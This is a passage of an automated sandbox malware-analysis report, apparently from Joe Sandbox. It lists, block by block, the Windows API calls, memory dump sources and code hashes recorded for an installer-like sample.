                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseValuelstrlen
                                                                                                            • String ID: C:\Users\user~1\AppData\Local\Temp\nscEDE4.tmp
                                                                                                            • API String ID: 2655323295-2165756891
                                                                                                            • Opcode ID: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                            • Instruction ID: 2320c74fc41ffeb716861e397aa06506e2c1d49fdd3331f7b5a779c93e7e4390
                                                                                                            • Opcode Fuzzy Hash: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                            • Instruction Fuzzy Hash: C4118471E00104BEEB10AFA5DE89EAEBB74EB44754F11803BF504B71D1DBB89D419B68
                                                                                                            APIs
                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close$Enum
                                                                                                            • String ID:
                                                                                                            • API String ID: 464197530-0
                                                                                                            • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                            • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                            • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                            • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                                                                            APIs
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,771B2EE0,00405B1A,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405D76
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                              • Part of subcall function 0040591F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Iw,?,00000000,000000F0), ref: 0040164D
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Iw, xrefs: 00401640
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                            • String ID: C:\Users\user\AppData\Local\Iw
                                                                                                            • API String ID: 1892508949-4214039554
                                                                                                            • Opcode ID: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                                            • Instruction ID: 0139da5d792eeb989572d84d187c25f91b4f70b2bd1842bf542401118de2a59f
                                                                                                            • Opcode Fuzzy Hash: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                                            • Instruction Fuzzy Hash: 0511E631504511EBCF30AFA4CD4159F36A0EF15329B29453BFA45B22F1DB3E49419B5D
                                                                                                            APIs
                                                                                                            • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                              • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                            • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                            • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                                            • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                            • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                                            APIs
                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,0040652A,80000002), ref: 004062FC
                                                                                                            • RegCloseKey.ADVAPI32(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 00406307
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseQueryValue
                                                                                                            • String ID: Call
                                                                                                            • API String ID: 3356406503-1824292864
                                                                                                            • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                            • Instruction ID: efe3e51cb47fe95fa6bbb83f3cb46ebf457b8c4b35673ac5825ceff03b23bf8b
                                                                                                            • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                            • Instruction Fuzzy Hash: B301717250020AEBDF218F55CD09EDB3FA9EF55354F114039FD15A2150E778D964CBA4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                            • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                            • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                            • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                            • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                            • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                            • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                            • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                            • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                            • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                            • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                            • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                            • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                            • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                            • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                            • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                            • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                            • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                            • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                            • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                            • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                            • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 004032F2
                                                                                                              • Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
                                                                                                            • SetFilePointer.KERNELBASE(0017237E,00000000,00000000,00414ED0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointer$CountTick
                                                                                                            • String ID:
                                                                                                            • API String ID: 1092082344-0
                                                                                                            • Opcode ID: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                            • Instruction ID: a2c2ae871b20a7f651e14226ae934804f023725c52e887911cb1b1382089a511
                                                                                                            • Opcode Fuzzy Hash: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                            • Instruction Fuzzy Hash: 54313872610215DBD721DF29EEC496A3BA9F74039A754433FE900F62E0CBB99D018B9D
                                                                                                            APIs
                                                                                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                                                                            • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user~1\AppData\Local\Temp\nscEDE4.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Enum$CloseValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 397863658-0
                                                                                                            • Opcode ID: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                                                                            • Instruction ID: 69a0bd767b5398a5b54c194fc83da7942780fa4e63ecbf8b5358c30743fc2944
                                                                                                            • Opcode Fuzzy Hash: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                                                                            • Instruction Fuzzy Hash: 4B017171904204ABEB149F95DE88ABF7AB8EF80348F10403EF505B61D0DAB85E419B69
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 973152223-0
                                                                                                            • Opcode ID: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                            • Instruction ID: f938e70baf20f89fc7421c1cbc4d65c8cbb1a4a40291e2e844035b0cdbff1196
                                                                                                            • Opcode Fuzzy Hash: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                            • Instruction Fuzzy Hash: 53314B30200219BBDB109F95ED84ADA3E68EB04759F20857EF905E62D0D6789A509BA9
                                                                                                            APIs
                                                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user~1\AppData\Local\Temp\nscEDE4.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
